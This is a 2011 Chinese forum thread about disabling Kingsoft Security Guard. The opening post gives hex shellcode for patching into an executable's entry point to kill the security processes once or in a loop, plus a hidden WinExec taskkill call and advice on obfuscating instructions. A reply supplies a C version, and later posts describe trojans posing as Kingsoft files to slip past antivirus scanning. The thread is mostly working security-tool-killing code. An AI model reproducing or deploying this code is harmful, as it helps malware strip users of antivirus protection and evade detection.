K金山卫士的方法

显示全部楼层 · 发表于 2011-12-16 20:56:54

本帖最后由 rsin 于 2011-12-16 20:57 编辑

意在讨论完善金山毒霸，无口水之意。
K金山卫士的方法如果你有源码查找

入口函数 int APIENTRY WinMain

然后加个 VC代码 WinExec("taskkill /f /im Ksafetray.exe",SW_HIDE);

或者生成EXE 给它加花指令

1.单单K一次金山卫士进程(修改新入口+0xC7处为原入口)
64A1300000008B400C8B401C8B008B40088BD8E80F00000047657450726F634164647265737300599089C389CF30C0AE75FD4F29CF87F98B433C8B7403788D741E18AD92AD50AD95AD9501D8897C2418894C24144A74278B349001DEF3A6740A8B7C24188B4C2414EBEAD1E201D50FB7441D00C1E0020304248B040301D85989442404895C2408E80800000057696E457865630053FF54240CE81F0000007461736B6B696C6C202F696D204B73616665547261792E657865202F660000C744240400000000FFD0680010400064FF35000000006489250000000033C0F7F0
2.无限循环K金山卫士进程(修改新入口+0xD4处为原入口)
64A1300000008B400C8B401C8B008B40088BD8E80F00000047657450726F634164647265737300599089C389CF30C0AE75FD4F29CF87F98B433C8B7403788D741E18AD92AD50AD95AD9501D8897C2418894C24144A74278B349001DEF3A6740A8B7C24188B4C2414EBEAD1E201D50FB7441D00C1E0020304248B040301D85989442404895C2408E80800000057696E457865630053FF54240CE9520100007461736B6B696C6C202F696D204B73616665547261792E657865202F660000C744240400000000FFD0E92D010000536C65657000FF742408FF5424086800010000FFD0E81200000064FF35000000006489250000000033C0F7F0812C24E6000000EBE5000064A1300000008B400C8B401C8B008B40088BD8E80F00000047657450726F634164647265737300599089C389CF30C0AE75FD4F29CF87F98B433C8B7403788D741E18AD92AD50AD95AD9501D8897C2418894C24144A74278B349001DEF3A6740A8B7C24188B4C2414EBEAD1E201D50FB7441D00C1E0020304248B040301D85989442404895C2408E80D00000043726561746554687265616400FF74240CFF54240CE8000000005981E9A90100006A006A006A00516A006A00FFD0E806000000536C65657000FF74240CFF54240C6800050000FFD0680010400064FF35000000006489250000000033C0F7F000008944240CE866000000E81E0000007461736B6B696C6C202F696D204B736166655376632E657865202F660000596A0051FF542410E81C0000007461736B6B696C6C202F696D204B736166652E657865202F66D70000596A0051FF542410E8000000005981E99000000051E973FEFFFF5981E95B01000051E951FEFFFF

显示全部楼层 · 发表于 2011-12-16 21:00:06

这是些神马东西。。。

显示全部楼层 · 发表于 2011-12-16 21:00:28

那堆16进制是什么。。

显示全部楼层 · 发表于 2011-12-16 21:03:10

本帖最后由李白vs苏轼于 2011-12-16 21:23 编辑

其实他没有自保把,没有阻止你结束进程,我没用过

WinExec里面使用了常用的结束进程的命令,并HIDE窗口

其实直接在system函数加,,不就行了,连HIDE都省了

#include <stdlib.h>
#include <stdio.h>
int main(void)
{
system("taskkill /f /im Ksafetray.exe");
return 0;
}

复制代码

显示全部楼层 · 发表于 2011-12-16 21:12:02

李白vs苏轼发表于 2011-12-16 21:03
其实他没有自保把,我没用过

WinExec里面使用了常用的结束进程的命令,并HIDE窗口

卫士的自保有也不行，现在木马一运行伪装成金山卫士，毒霸就怎么也不杀他

显示全部楼层 · 发表于 2011-12-16 21:14:22

本帖最后由李白vs苏轼于 2011-12-16 21:30 编辑

rsin 发表于 2011-12-16 21:12
卫士的自保有也不行，现在木马一运行伪装成金山卫士，毒霸就怎么也不杀他

我是指taskkill命令,,一般是没阻止结束进程的才有效把,,

现在木马一运行伪装成金山卫士，毒霸就怎么也不杀他

这句啥意思啊

显示全部楼层 · 发表于 2011-12-16 21:17:04

李白vs苏轼发表于 2011-12-16 21:14
我是指taskkill命令,,一般是没阻止结束进程的才有效把,,

恩

显示全部楼层 · 发表于 2011-12-16 21:40:32

没看懂，不过金山卫士的进程用任务管理器就能结束啊，卫士本来就没自保的，辅助软件

显示全部楼层 · 发表于 2011-12-16 21:48:09

yesha08 发表于 2011-12-16 21:40
没看懂，不过金山卫士的进程用任务管理器就能结束啊，卫士本来就没自保的，辅助软件

就是普通方法，不过请看5楼

显示全部楼层 · 发表于 2011-12-16 21:49:17

李白vs苏轼发表于 2011-12-16 21:14
我是指taskkill命令,,一般是没阻止结束进程的才有效把,,

就是把木马伪装成金山卫士的文件。金山毒霸就怎么也不会扫描到他并报毒

[金山] K金山卫士的方法